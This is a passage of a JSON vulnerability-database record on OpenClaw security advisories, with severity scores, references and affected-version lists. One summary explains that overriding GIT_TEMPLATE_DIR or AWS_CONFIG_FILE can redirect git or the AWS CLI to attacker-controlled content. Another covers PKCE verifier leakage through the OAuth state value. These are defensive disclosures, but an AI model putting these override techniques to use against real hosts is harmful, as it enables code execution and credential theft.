"reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g374-mggx-p6xc", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:38:09Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g374-mggx-p6xc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41404", "reference_id": "CVE-2026-41404", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41404" }, { "reference_url": "https://github.com/advisories/GHSA-g374-mggx-p6xc", "reference_id": "GHSA-g374-mggx-p6xc", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g374-mggx-p6xc" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-operator-admin-privilege-escalation-via-trusted-proxy-authentication", "reference_id": "openclaw-operator-admin-privilege-escalation-via-trusted-proxy-authentication", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:38:09Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-operator-admin-privilege-escalation-via-trusted-proxy-authentication" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41404", "GHSA-g374-mggx-p6xc" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b9w3-w2nq-cqg6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91029?format=api", "vulnerability_id": "VCID-bg1d-gmxy-wkc6", "summary": "OpenClaw host-env blocklist missing `GIT_TEMPLATE_DIR` and `AWS_CONFIG_FILE` allows code execution via env override\n## Summary\n\nHost execution env sanitization did not block `GIT_TEMPLATE_DIR` or `AWS_CONFIG_FILE`, even though both can redirect trusted tooling to attacker-controlled content.\n\n## Impact\n\nAn approved exec request could redirect git or AWS CLI behavior through attacker-controlled configuration and execute untrusted code or load attacker-selected credentials.\n\n## Affected Component\n\n`src/infra/host-env-security-policy.json, src/infra/host-env-security.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `6eb82fba3c` (`Infra: block additional host exec env keys`).\n\nOpenClaw thanks @nicky-cc of Tencent zhuque Lab [https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard) for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41332", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05589", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05576", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05574", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41332" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/6eb82fba3cbfd0e50b179c1fada92e1e22dce7fa", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/6eb82fba3cbfd0e50b179c1fada92e1e22dce7fa" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m866-6qv5-p2fg", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:46:25Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m866-6qv5-p2fg" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-code-execution-via-missing-environment-variable-blocklist", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "5.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:46:25Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-code-execution-via-missing-environment-variable-blocklist" }, { "reference_url": "https://github.com/advisories/GHSA-m866-6qv5-p2fg", "reference_id": "GHSA-m866-6qv5-p2fg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m866-6qv5-p2fg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41332", "GHSA-m866-6qv5-p2fg" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bg1d-gmxy-wkc6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89289?format=api", "vulnerability_id": "VCID-bgwh-spue-yybk", "summary": "OpenClaw: Gemini OAuth exposed the PKCE verifier through the OAuth state parameter\n## Summary\n\nBefore OpenClaw 2026.4.2, the Gemini OAuth flow reused the PKCE verifier as the OAuth `state` value. Because the provider reflected `state` back in the redirect URL, the verifier could be exposed alongside the authorization code.\n\n## Impact\n\nAnyone who could capture the redirect URL could learn both the authorization code and the PKCE verifier, defeating PKCE's interception protection for that flow and enabling token redemption.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `a26f4d0f3ef0757db6c6c40277cc06a5de76c52f` — separate OAuth state from the PKCE verifier\n\nOpenClaw thanks @BG0ECV for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34511", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11185", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11219", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11226", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34511" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T16:56:07Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T16:56:07Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34511", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34511" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T16:56:07Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter" }, { "reference_url": "https://github.com/advisories/GHSA-9jpj-g8vv-j5mf", "reference_id": "GHSA-9jpj-g8vv-j5mf", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9jpj-g8vv-j5mf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { 